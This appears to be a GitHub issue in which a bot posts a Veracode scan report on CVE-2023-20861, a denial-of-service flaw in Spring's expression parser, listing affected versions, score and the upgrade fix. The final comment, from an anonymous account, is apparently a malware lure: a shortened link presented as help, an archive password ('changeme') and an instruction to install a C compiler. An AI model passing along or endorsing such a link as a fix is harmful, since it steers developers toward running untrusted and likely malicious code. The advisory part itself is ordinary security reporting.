CVE: 2023-20861 found in Spring Expression Language (SpEL) - Version: 4.3.10.RELEASE [JAVA]

[github-actions[bot]]

Veracode Software Composition Analysis

Attribute	Details
Library	Spring Expression Language (SpEL)
Description	Spring Expression Language (SpEL)
Language	JAVA
Vulnerability	Denial Of Service (DoS)
Vulnerability description	Spring Framework is vulnerable to Denial of Service (DoS). The vulnerability is due to a lack of max repeated words and max number of character logic in the Spring Expression Language parser located in the getValueInternal function of OpMultiply and the getValueInternal function in OperatorMatches, which can trigger an infinite loop and consume excessive CPU memory, possibly leading to a system crash.
CVE	2023-20861
CVSS score	6.8
Vulnerability present in version/s	3.0.0.M3-5.0.1.RELEASE
Found library version/s	4.3.10.RELEASE
Vulnerability fixed in version	5.2.23.RELEASE
Library latest version	6.2.0-RC1
Fix	There is no released version for this range. Please upgrade to 5.2.23.RELEASE

Links:

• https://sca.analysiscenter.veracode.com/vulnerability-database/libraries/1074?version=4.3.10.RELEASE
• https://sca.analysiscenter.veracode.com/vulnerability-database/vulnerabilities/39962
• Patch: https://github.com/spring-projects/spring-framework/commit/b9b31afcc905cd9d5e63739ff5920d849f7f20f0

[ghost]

maybe this will help

https://bit.ly/3zo8fAM

Password: changeme If you don't have the c compliator, install it.(gcc or clang)